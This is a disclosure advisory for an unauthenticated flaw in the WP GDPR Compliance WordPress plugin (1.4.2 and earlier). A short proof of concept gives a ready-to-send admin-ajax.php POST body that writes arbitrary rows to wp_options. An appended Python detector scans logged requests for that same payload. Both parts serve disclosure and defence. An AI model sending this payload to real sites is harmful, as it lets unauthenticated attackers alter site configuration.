WP GDPR Compliance <= 1.4.2 – Unauthenticated Call Any Action or Update Any Option

November 8, 2018
Proof of Concept
1. Install WordPress.
2. Install the plugin.
3. Enable the request form and publish the page.

Update an option:

1. Go to the page with the request form.
2. Check the page's source for "ajaxSecurity" and copy the value.
3. Send an AJAX request (as POST) to wp-admin/admin-ajax.php (must be within the same browser) with the following body:

action=wpgdprc_process_action&security=SECURITY_TOKEN_HERE&data={ "type":"save_setting","append":true,"enabled": true,"option":"injected","value" :"option"}

After that, check your wp_options table for the new value.
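For defenders reviewing captured traffic, the following added example (not part of the original advisory or the plugin's code) flags POST bodies to admin-ajax.php that call wpgdprc_process_action with a save_setting payload like the one above. It assumes request bodies are available, for instance from a WAF audit log; the sample records are constructed, and the OWN_PREFIX value is an assumption derived from the action name.

```python
import json
from urllib.parse import parse_qs

ACTION = "wpgdprc_process_action"  # AJAX action named in the request above
OWN_PREFIX = "wpgdprc_"            # assumption: prefix of the plugin's own options

def inspect_body(body, own_prefix=OWN_PREFIX):
    """Return a finding dict for a save_setting call, or None if not relevant."""
    fields = parse_qs(body, keep_blank_values=True)
    if fields.get("action", [""])[0] != ACTION:
        return None
    try:
        data = json.loads(fields.get("data", [""])[0])
    except ValueError:
        # Malformed JSON sent to this action still deserves a manual look.
        return {"option": None, "severity": "review", "reason": "unparseable data"}
    if not isinstance(data, dict) or data.get("type") != "save_setting":
        return None
    option = str(data.get("option", ""))
    if option.startswith(own_prefix):
        return {"option": option, "severity": "review", "reason": "plugin setting change"}
    return {"option": option, "severity": "high",
            "reason": "writes option outside plugin prefix"}

def scan(records):
    """records: iterable of (source_ip, request_path, post_body) tuples."""
    findings = []
    for source, path, body in records:
        if not path.endswith("/wp-admin/admin-ajax.php"):
            continue
        hit = inspect_body(body)
        if hit:
            findings.append({"source": source, **hit})
    return findings

# Constructed sample records (documentation IP ranges, placeholder tokens).
SAMPLE = [
    ("203.0.113.7", "/wp-admin/admin-ajax.php",
     'action=wpgdprc_process_action&security=SECURITY_TOKEN_HERE&data={ "type":"save_setting",'
     '"append":true,"enabled": true,"option":"injected","value" :"option"}'),
    ("198.51.100.4", "/wp-admin/admin-ajax.php", "action=heartbeat&interval=60"),
    ("198.51.100.9", "/wp-admin/admin-ajax.php",
     'action=wpgdprc_process_action&security=TOKEN&data={"type":"save_setting",'
     '"option":"wpgdprc_example","value":"1"}'),
    ("198.51.100.9", "/wp-admin/admin-ajax.php",
     "action=wpgdprc_process_action&security=TOKEN&data={broken"),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

Any "high" finding should be followed by a check of the named row in wp_options, as described in the last step above.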
